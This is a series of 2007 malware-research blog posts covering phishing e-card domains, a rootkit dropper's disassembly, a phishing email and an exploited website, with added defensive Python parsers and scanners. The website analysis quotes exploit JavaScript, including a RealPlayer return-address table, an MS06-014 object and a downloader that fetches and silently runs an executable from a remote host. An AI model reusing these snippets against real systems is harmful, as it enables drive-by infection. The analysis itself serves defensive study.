[Malware] The Phishing Storm of 2008

December 30, 2007

Caution: the following post contains explicit malware content, be careful!!!!

As at every end of year, the Web registers a significant increase of malware attacks on various fronts, in particular website phishing frauds, file infections and new rootkits.

This information can be verified by consulting http://www.antiphishing.org/

Obviously 90% of the frauds come from fake websites themed on the current holidays, such as Christmas gifts and online e-card / postcard services. In the last days, for example, I've found two phishing e-card websites:

familypostcards2008.com

uhavepostcard.com

Let's look up these websites:

———————————

Domain name:             UHAVEPOSTCARD.COM
Name Server:             ns.uhavepostcard.com 74.66.92.4
Name Server:             ns10.uhavepostcard.com 193.150.206.29
Name Server:             ns11.uhavepostcard.com 24.151.246.25
Name Server:             ns12.uhavepostcard.com 78.60.126.188
Name Server:             ns13.uhavepostcard.com 78.60.126.188
Name Server:             ns2.uhavepostcard.com 71.11.228.181
Name Server:             ns3.uhavepostcard.com 76.236.158.155
Name Server:             ns4.uhavepostcard.com 76.226.91.98
Name Server:             ns5.uhavepostcard.com 68.45.61.150
Name Server:             ns6.uhavepostcard.com 65.35.110.50
Name Server:             ns7.uhavepostcard.com 67.58.159.109
Name Server:             ns8.uhavepostcard.com 70.92.107.11
Name Server:             ns9.uhavepostcard.com 12.216.86.166
Creation Date:           2007.12.23
Updated Date:            2007.12.24
Expiration Date:         2008.12.23
---------------------------------
Domain name:             FAMILYPOSTCARDS2008.COM
Name Server:             ns.familypostcards2008.com 71.130.195.9
Name Server:             ns10.familypostcards2008.com 86.137.196.186
Name Server:             ns11.familypostcards2008.com 78.60.126.188
Name Server:             ns12.familypostcards2008.com 76.174.52.123
Name Server:             ns13.familypostcards2008.com 71.230.66.163
Name Server:             ns2.familypostcards2008.com 76.205.135.226
Name Server:             ns3.familypostcards2008.com 75.9.137.204
Name Server:             ns4.familypostcards2008.com 76.206.232.36
Name Server:             ns5.familypostcards2008.com 98.201.54.7
Name Server:             ns6.familypostcards2008.com 69.247.162.86
Name Server:             ns7.familypostcards2008.com 74.161.36.118
Name Server:             ns8.familypostcards2008.com 12.217.82.249
Name Server:             ns9.familypostcards2008.com 193.150.206.29
Creation Date:           2007.12.29
Updated Date:            2007.12.29
Expiration Date:         2008.12.29

———————————

It's truly curious that these domains come from Los Angeles and were created only for these holidays :)
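The records above show the pattern of a throwaway fast-flux phishing domain: many name servers inside the domain itself, each on an unrelated IP, on a domain registered days before use. The following added example (not part of the original post) parses that whois output and scores those indicators; the excerpt embeds the first five name servers of the UHAVEPOSTCARD.COM record quoted above and uses the post's date as the observation date.

```python
import re
from datetime import date

# Excerpt of the UHAVEPOSTCARD.COM whois record quoted in the post (first
# five name servers only; the full record has thirteen).
WHOIS_SAMPLE = """\
Domain name:             UHAVEPOSTCARD.COM
Name Server:             ns.uhavepostcard.com 74.66.92.4
Name Server:             ns10.uhavepostcard.com 193.150.206.29
Name Server:             ns11.uhavepostcard.com 24.151.246.25
Name Server:             ns12.uhavepostcard.com 78.60.126.188
Name Server:             ns13.uhavepostcard.com 78.60.126.188
Creation Date:           2007.12.23
Updated Date:            2007.12.24
Expiration Date:         2008.12.23
"""
OBSERVED = date(2007, 12, 30)  # the post's date, used as "today"

NS_RE = re.compile(r"^Name Server:\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.M)
CREATED_RE = re.compile(r"^Creation Date:\s+(\d{4})\.(\d{2})\.(\d{2})\s*$", re.M)

def parse_whois(text):
    """Return (domain, [(ns_name, ip), ...], creation_date)."""
    domain = re.search(r"^Domain name:\s+(\S+)", text, re.M).group(1).lower()
    y, m, d = map(int, CREATED_RE.search(text).groups())
    return domain, NS_RE.findall(text), date(y, m, d)

def flux_indicators(text, observed=OBSERVED, min_ns=5, max_age_days=14):
    """Score a record the way an analyst reading the post would: many
    name servers inside the domain itself, spread over unrelated networks,
    on a domain only days old is the fast-flux pattern behind throwaway
    e-card phishing sites. Returns (domain, age_days, distinct_ips, flags)."""
    domain, servers, created = parse_whois(text)
    ips = {ip for _, ip in servers}
    age = (observed - created).days
    flags = {
        "many_nameservers": len(servers) >= min_ns,
        "nameservers_in_domain": all(ns.endswith("." + domain) for ns, _ in servers),
        "ips_spread_across_networks": len({ip.split(".")[0] for ip in ips}) >= 3,
        "young_domain": 0 <= age <= max_age_days,
    }
    return domain, age, len(ips), flags

if __name__ == "__main__":
    dom, age, n_ips, flags = flux_indicators(WHOIS_SAMPLE)
    print(f"{dom}: {age} days old, {n_ips} distinct NS IPs, {sum(flags.values())}/4 flags")
```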

The malware being spread is always the same, only under different file names:

  • happy_2008.exe
  • Happy2008.exe
  • stripshow.exe
  • happynewyear2008.exe

So pay attention to these Postcard sites.. ;)

Regards,

Evilcry


[MALWARE] Happy-2008.exe Win32.Zhelatin.pk Rootkit

December 29, 2007

Happy-2008 seems to be a new kind of virus, created for the occasion of the
new year.

It's spread in the form of an executable, neither packed nor PE-tricked.
It can be downloaded from an e-card website.

At the current state it seems that AVs do not detect it; only some
flag it as Suspect-Zipped-File.

.:: The Essay ::.
It gets the current system directory and then sets /system32 as the
working directory.
Next, with GetFullPathNameA, it retrieves "C:\WINDOWS\System32\init_sys.config".

If the file exists it tries to determine its attributes, else it creates the file:

0040126A  PUSH EBX                                 ; /hTemplateFile => NULL
0040126B  PUSH 80                                  ; |Attributes = NORMAL
00401270  PUSH 2                                   ; |Mode = CREATE_ALWAYS
00401272  PUSH EBX                                 ; |pSecurity => NULL
00401273  PUSH 7                                   ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE|4
00401275  PUSH 40000000                            ; |Access = GENERIC_WRITE
0040127A  LEA EAX,DWORD PTR SS:[EBP-114]           ; |
00401280  PUSH EAX                                 ; |FileName = "C:\WINDOWS\System32\init_sys.config"
00401281  CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

00401293  PUSH ESI ;Points to an Embedded Executable
00401294  PUSH EDI
00401295  MOV EDI,DWORD PTR DS:[<&KERNEL32.WriteFi>;  kernel32.WriteFile
0040129B  PUSH 0
0040129D  LEA EAX,DWORD PTR SS:[EBP-C] ;System Path
004012A0  PUSH EAX
004012A1  LEA ESI,DWORD PTR DS:[EBX+422A98] ; [config] String
004012A7  PUSH DWORD PTR DS:[ESI]

A file "init_sys.config" is created and filled with three section headers:
[config]
[local]
[peers]
Subsequently, a series of values is appended to this config file immediately after
[peers]; they have this form:

00003D6C8F338A3FDD3DF3648666F55C=0CCFC042170F00

0040132D  CALL happy-20.0040122D       ;Builds init_sys.config and fills it
00401332  LEA ECX,DWORD PTR SS:[EBP-8]
00401335  CALL happy-20.004016E8

00401351  CALL happy-20.00401634 ;EAX = String obtained from GetSystemTime Output

After some calls, EAX points to a new string "init_1a30-12f1"

00401391   PUSH EAX                                 ; /pFilenameInPath
00401392   PUSH DWORD PTR SS:[EBP-8]                ; |Path
00401395   PUSH EBX                                 ; |MaxPathSize
00401396   PUSH DWORD PTR SS:[EBP-4]                ; |FileName
00401399   CALL DWORD PTR DS:[<&KERNEL32.GetFullPat>; \GetFullPathNameA
0040139F   PUSH happy-20.004020D4                   ;  ASCII ".sys"
004013A4   LEA ECX,DWORD PTR SS:[EBP-8]
004013A7   CALL happy-20.00401108

Inside the call at 00401108 a new string is assembled, "init_1a30-12f1.sys";
please note that the numerical part of the .sys file name changes at every run
because it depends on the GetSystemTime output.

004013B1   PUSH ESI ;NULL
004013B2   PUSH ESI ;NULL
004013B3   CALL OpenSCManagerA
004013B9   CMP EAX,ESI
004013BB   MOV DWORD PTR SS:[EBP-C],EAX
004013BE   JE happy-20.004014D9

After opening the Service Control Manager on the local host, the service status list is enumerated and:

00401407  PUSH DWORD PTR SS:[EBP-18]             ; /Arg3
0040140A  PUSH EDI                               ; |Arg2
0040140B  PUSH DWORD PTR DS:[EBX]                ; |Arg1 = 0012FE62 ASCII "Abiosdsk"
0040140D  CALL happy-20.00401579                 ; \happy-20.00401579

This call compares the names of the services present in the system with 'init_':

abp480n5,ACPI,adpu16, etc..

After this check, GetLastError is called:

0040142E  JNZ SHORT happy-20.0040143D
00401430  CALL GetLastError
00401436  CMP EAX,0EA
0040143B  JE SHORT happy-20.004013D1

If the service exists and is running, the task of happy_2008 ends here.
Otherwise, a copy of a device driver is extracted from the executable and run as a
kernel service.
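As an added triage helper (not the author's code), the following parses an init_sys.config laid out as described above ([config] / [local] / [peers] plus hex peer entries) and flags installed service names the way the dropper's own check does, with the init_XXXX-XXXX pattern reported separately; the config sample and the service list are constructed, and the 4hex-4hex shape of the suffix is an assumption taken from the single sample "init_1a30-12f1".

```python
import re

# Constructed sample of the dropped init_sys.config, laid out as the post
# describes: three section headers, then peer entries after [peers]
# (the one quoted in the post plus a second constructed line).
SAMPLE_CONFIG = """[config]
[local]
[peers]
00003D6C8F338A3FDD3DF3648666F55C=0CCFC042170F00
00007A1B2C3D4E5F60718293A4B5C6D7=1A2B3C4D5E6F00
"""
# Constructed service list: driver names quoted in the post plus one built
# the way the dropper builds its driver name (init_<time-derived suffix>).
SAMPLE_SERVICES = ["Abiosdsk", "abp480n5", "ACPI", "adpu160m", "init_1a30-12f1"]

PEER_RE = re.compile(r"^([0-9A-F]{32})=([0-9A-F]+)$")
# Assumption: the suffix keeps the 4hex-4hex shape of the one sample
# ("init_1a30-12f1"); the bare init_ prefix is what the dropper checks.
DRIVER_NAME_RE = re.compile(r"^init_[0-9a-f]{4}-[0-9a-f]{4}(\.sys)?$", re.I)

def parse_init_sys_config(text):
    """Return ({section: [lines]}, [(peer_id, value)]); reject anything
    outside the [config]/[local]/[peers] layout so an unrelated file that
    merely shares the name does not trigger a false positive."""
    sections, peers, current = {}, [], None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is None:
            raise ValueError("entry before any section header")
        else:
            sections[current].append(line)
            if current == "peers":
                m = PEER_RE.match(line)
                if not m:
                    raise ValueError("malformed peer entry: " + line)
                peers.append(m.groups())
    if set(sections) != {"config", "local", "peers"}:
        raise ValueError("unexpected section layout: %s" % sorted(sections))
    return sections, peers

def suspicious_services(names):
    """Names the dropper would treat as 'already installed' (init_ prefix),
    plus the subset matching the time-derived driver name shape."""
    prefixed = [n for n in names if n.lower().startswith("init_")]
    return prefixed, [n for n in prefixed if DRIVER_NAME_RE.match(n)]
```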

I've extracted that device driver with a hex editor; it starts at 00403018 and ends at
00424FF8.
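Carving the embedded driver by hand in a hex editor means eyeballing its start and end offsets. The following added example (not from the post) does the same job programmatically: it scans a buffer for an MZ header whose e_lfanew points at a PE signature and sizes the image from its section table; the host buffer and the minimal non-runnable PE inside it are constructed.

```python
import struct

def build_fake_pe(payload=b"\xcc" * 64):
    """Constructed stand-in for the embedded driver: a minimal PE image
    (DOS header, PE signature, COFF header, one section header, raw
    section) that is not runnable but has a valid-looking layout."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew -> "PE\0\0"
    # COFF: i386, 1 section, no optional header (size 0), flags EXEC|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    raw_ptr = 64 + 4 + 20 + 40                       # section data follows headers
    section = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x1000,
                          len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + section + payload

# Constructed host: junk, a decoy "MZ" with garbage after it, more junk,
# then the embedded image, then trailing bytes.
HOST = b"\x90" * 100 + b"MZ\x00\x00" + b"\x90" * 200 + build_fake_pe() + b"\x00" * 20

def carve_embedded_pe(blob):
    """Return [(offset, size)] for every plausible PE image inside blob.
    Size comes from the section table (end of the last raw section), which
    is what a hex-editor extraction has to estimate by hand."""
    found, pos = [], 0
    while True:
        start = blob.find(b"MZ", pos)
        if start == -1 or start + 0x40 > len(blob):
            return found
        pos = start + 2
        e_lfanew = struct.unpack_from("<I", blob, start + 0x3C)[0]
        pe = start + e_lfanew
        if e_lfanew > 0x1000 or pe + 24 > len(blob) or blob[pe:pe + 4] != b"PE\0\0":
            continue                                   # stray "MZ" bytes
        nsections = struct.unpack_from("<H", blob, pe + 6)[0]
        opt_size = struct.unpack_from("<H", blob, pe + 20)[0]
        table = pe + 24 + opt_size
        if not 0 < nsections <= 96 or table + 40 * nsections > len(blob):
            continue
        end = table + 40 * nsections - start            # at least the headers
        for i in range(nsections):
            raw_size, raw_ptr = struct.unpack_from("<II", blob, table + 40 * i + 16)
            end = max(end, raw_ptr + raw_size)
        if start + end <= len(blob):
            found.append((start, end))
```

Note that the offsets quoted in the post are debugger addresses of the loaded image; a carver like this works on file offsets, which is what you want when writing the driver out to disk.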

This rootkit hides itself, but in the next part we will discover what it
does :)

See you in the second part.. :)


(Merry Christmas || Happy Sol Invictus)

December 24, 2007

Merry Christmas!!!!!!!

May this Christmas be full of Peace and Serenity for You and Your Families..

Regards,

Evilcry


The Thousands Ways of SPAM [CartaSi Fraud]

December 22, 2007

Hi,

As every day, also this morning I've checked my honeypot mail address, and a curious mail message reached me; this is the original message:

Dear Customer,

The authorization code of your online account has been entered incorrectly more than three times.
To protect your account we have suspended access.
To recover access please log in and complete the activation page.

Thank you again for choosing CartaSi's online services.
Best regards.

CartaSi Customer Service
****************************************************************
DO YOU WANT TO DISPUTE A CHARGE?

Easy Claim is the service for you!

****************************************************************

Please do not reply to this email: for any communication, log in to the Cardholders' Portal (http://www.cartasi.it//) and write to us through 'Lo sportello del Cliente': it is the easiest way to get a quick answer from our operators.
Thank you for your cooperation.
++++++++++++++++++++++++++++++++++

CartaSi is a bank service, but it is really strange that the subject has grammar errors; let's trace the first link with Malzilla..

WebSite: http://aquarossall.plus.com/

The first operation is a whois on this strange link, which exposes music album covers..

—————

Website Title: PlusNet | Home & Business Broadband Internet Access & Phone Services UK
Title Relevancy 77%

—————————————

The link comes from the PlusNet network; Malzilla also detects a chain of redirections:

–> djtees.com/
–> djtees.com/tshop/store/default.asp?idAffiliate=
Redirection to index.asp –> djtees.com/tshop/store/index.asp
The website is not dangerous, but it is surely boring to see these stupid forms of spam.

See you in the next post.. :)


[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

December 20, 2007

Hi,

A new virus similar to 31joy.com/rb.vg attacked some websites (one in particular, {CENSORED}.biz); it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this website are first exploited (if poorly armored) and subsequently infected by adware and spyware.

I've analysed the website with Malzilla; the infection is a classical one: it inserts malicious code at the top of the pages, so when a victim visits the site 4 infected iframes are loaded, and some '.js' and '.cab' files are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm

http://{CENSORED}.php?id{CENSORED}we{CENSORED}=pic1

Let's analyse the first iframe; a .js is loaded:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

[...]

else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
ret = unescape("%51%11%70%63");

[...]

}

It's clear that the first iframe launches the famous RealTime exploit that allows remote code execution.

The second iframe, 2.htm, leads to another JavaScript:

function init()
{

var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

This CLSID is suspicious; let's search for it. It's another common exploit: RDS.DataStore – Data Execution (CVE-2006-0003 / MS06-014). The iframe itself loads other objects:
0614.js
MPS.js
PowerPlayerCtrl.js

4.CAB -> contains bd.exe or r.exe, which is Worm/Cekar.A

Let's see the first one, 0614.js:

var url="http://{CENSORED}/real.exe";
[...]
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c " + path,"","open",0)}
[...]
The previous Data Execution exploit calls this JavaScript, which downloads and executes real.exe, which is obviously a virus, Win32.Worm.Cekar..

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third IFrame xl.htm

It calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F, which is another exploit attempting to trigger a buffer overflow vulnerability in the Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control; this leads to another remote code execution.

–> Last iframe: seems to be only a counter
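A small offline scanner for the indicators Malzilla surfaced above (zero-size injected iframes, the two CLSIDs named in this post, and version-keyed unescape() tables like the RealExploit() stub), as an added example that is not part of the original post; the HTML fragment and the example.invalid URLs are constructed.

```python
import re

# Constructed page fragment modelled on what the post describes: a
# zero-size iframe injected at the top, an <object> with the MS06-014
# RDS CLSID, a version-keyed unescape() table, and one ordinary iframe.
SAMPLE_HTML = """<iframe src="http://example.invalid/2.htm" width="0" height="0"></iframe>
<html><body>
<object id="ado" classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"></object>
<script>
var ret; var RealVersion = "6.0.14.544";
if(RealVersion == "6.0.14.544") ret = unescape("%63%11%08%60");
</script>
<iframe src="http://example.invalid/counter.htm" width="468" height="60"></iframe>
</body></html>"""

# CLSIDs named in the post, keyed to the component they abuse.
KNOWN_BAD_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataStore (CVE-2006-0003 / MS06-014)",
    "F3E70CEA-956E-49CC-B444-73AFE593AD7F": "Xunlei Thunder PPLAYER.DLL_1_WORK overflow",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
CLSID_RE = re.compile(r"clsid:([0-9A-F-]{36})", re.I)
UNESCAPE_RE = re.compile(r'unescape\("((?:%[0-9A-F]{2})+)"\)', re.I)

def hidden_iframes(html):
    """Iframes with zero width or height, the usual shape of an injected
    loader; returns their src values."""
    out = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            out.append(attrs.get("src", ""))
    return out

def bad_clsids(html):
    """Known-bad CLSIDs referenced by <object> tags, with their description."""
    return [(c.upper(), KNOWN_BAD_CLSIDS[c.upper()])
            for c in CLSID_RE.findall(html) if c.upper() in KNOWN_BAD_CLSIDS]

def unescape_blobs(html):
    """Percent-encoded literals fed to unescape(); version-keyed tables of
    these are the fingerprint of the RealExploit() stub quoted in the post."""
    return [bytes.fromhex(b.replace("%", "")) for b in UNESCAPE_RE.findall(html)]

def scan(html):
    return {"hidden_iframes": hidden_iframes(html), "bad_clsids": bad_clsids(html),
            "unescape_blobs": unescape_blobs(html)}
```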

See you in the next post! :)


Crypto Reverse Engineering Speech

December 18, 2007

Hi,

I'm working on a chat-conference speech on cryptography and reverse engineering for the Reversity program promoted by Reteam.

Obviously I accept suggestions and topics to talk about :)

First Reversity Session: POSTPONED to Sunday Jan 6 2008 12:00 EST (GMT-5) or 17:00 GMT 

On EFNet chan: #reversity

In the next days I’ll publish here the Talk Index

See you in the next post.. :)


RBN (Russian Bank Network) Analysis

December 7, 2007

Hi,

There are some places in the world where life is dangerous. The Internet has some dark zones too, and RBN is one of them. RBN stands for Russian Business Network and it's a nebulous organisation which aims to fulfil cyber crime.

This study aims to provide some enlightenment on RBN activities and tries to detail how they work. Indeed RBN has many constituents and it's hard to have an exact idea of the goal of some of them and the way they're linked with other constituents.
There are some countermeasures available but they don't make sense for home users or even companies. Only ISPs, IXPs and internet regulators can help mitigate risks originating from RBN and other malicious groups.

http://research-labs.net/news/13-Russian+Business+Network+study.html

http://www.bizeul.org/files/RBN_study.pdf

See you in the next post.. :)

